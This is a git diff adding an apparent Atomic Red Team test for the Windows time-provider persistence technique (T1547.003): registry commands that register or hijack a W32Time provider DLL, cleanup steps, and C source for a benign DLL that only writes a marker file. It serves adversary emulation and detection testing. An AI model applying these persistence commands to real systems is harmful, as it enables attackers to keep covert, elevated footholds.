diff --git a/atomics/T1547.003/T1547.003.yaml b/atomics/T1547.003/T1547.003.yaml new file mode 100644 index 00000000..e0dedc88 --- /dev/null +++ b/atomics/T1547.003/T1547.003.yaml @@ -0,0 +1,52 @@ +attack_technique: T1547.003 +display_name: Time Providers +atomic_tests: +- name: Create a new time provider + + description: | + Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. + The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt + in C:\Users\Public\ as validation that the test is successful. + + Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/ + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f + net start w32time + cleanup_command: | + net stop w32time + reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f + rm -force C:\Users\Public\AtomicTest.dll + name: powershell + elevation_required: true + +- name: Edit an existing time provider + + description: | + Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. + The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt + in C:\Users\Public\ as validation that the test is successful. + + Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/ + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f + net start w32time + cleanup_command: | + net stop w32time + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Windows\SYSTEM32\w32time.DLL" /f + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f + rm -force C:\Users\Public\AtomicTest.dll + name: powershell + elevation_required: true \ No newline at end of file diff --git a/atomics/T1547.003/bin/AtomicTest.dll b/atomics/T1547.003/bin/AtomicTest.dll new file mode 100644 index 00000000..a767202b Binary files /dev/null and b/atomics/T1547.003/bin/AtomicTest.dll differ diff --git a/atomics/T1547.003/src/AtomicTest.c b/atomics/T1547.003/src/AtomicTest.c new file mode 100644 index 00000000..a149d5e0 --- /dev/null +++ b/atomics/T1547.003/src/AtomicTest.c @@ -0,0 +1,65 @@ +/* + Atomic Test T1547.003 + + Author: traceflow + https://github.com/tr4cefl0w + + Credits: https://github.com/scottlundgren/w32time + https://pentestlab.blog/2019/10/22/persistence-time-providers/ + + Resources: https://docs.microsoft.com/en-us/windows/win32/sysinfo/creating-a-time-provider + https://docs.microsoft.com/en-us/windows/win32/sysinfo/sample-time-provider +*/ + + +#include +#include "timeprov.h" + +TimeProvSysCallbacks sc; +const TimeProvHandle htp = (TimeProvHandle)1; +TpcGetSamplesArgs Samples; +DWORD dwPollInterval; + +void Run(void) { + + CreateFile("c:\\users\\public\\AtomicTest.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + + return; + +} + +HRESULT CALLBACK TimeProvOpen(WCHAR *wszName, TimeProvSysCallbacks *pSysCallback, TimeProvHandle *phTimeProv) { + + CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Run, 0, 0, 0); + + CopyMemory(&sc, (PVOID)pSysCallback, sizeof(TimeProvSysCallbacks)); + *phTimeProv = htp; + + return S_OK; +} + +HRESULT CALLBACK TimeProvCommand(TimeProvHandle hTimeProv, TimeProvCmd eCmd, PVOID pvArgs) { + + switch( eCmd ) { + case TPC_GetSamples: + // Return the Samples structure in pvArgs. + CopyMemory(pvArgs, &Samples, sizeof(TpcGetSamplesArgs)); + break; + case TPC_PollIntervalChanged: + // Retrieve the new value. + sc.pfnGetTimeSysInfo( TSI_PollInterval, &dwPollInterval ); + break; + case TPC_TimeJumped: + // Discard samples saved in the Samples structure. + ZeroMemory(&Samples, sizeof(TpcGetSamplesArgs)); + break; + case TPC_UpdateConfig: + // Read the configuration sirmation from the registry. + break; + } + return S_OK; +} + +HRESULT CALLBACK TimeProvClose(TimeProvHandle hTimeProv) { + return S_OK; +} \ No newline at end of file diff --git a/atomics/T1547.003/src/AtomicTest.def b/atomics/T1547.003/src/AtomicTest.def new file mode 100644 index 00000000..e3f8c293 --- /dev/null +++ b/atomics/T1547.003/src/AtomicTest.def @@ -0,0 +1,5 @@ +LIBRARY +EXPORTS + TimeProvOpen + TimeProvCommand + TimeProvClose \ No newline at end of file diff --git a/atomics/T1547.003/src/build.bat b/atomics/T1547.003/src/build.bat new file mode 100644 index 00000000..e87c0a8c --- /dev/null +++ b/atomics/T1547.003/src/build.bat @@ -0,0 +1 @@ +cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll \ No newline at end of file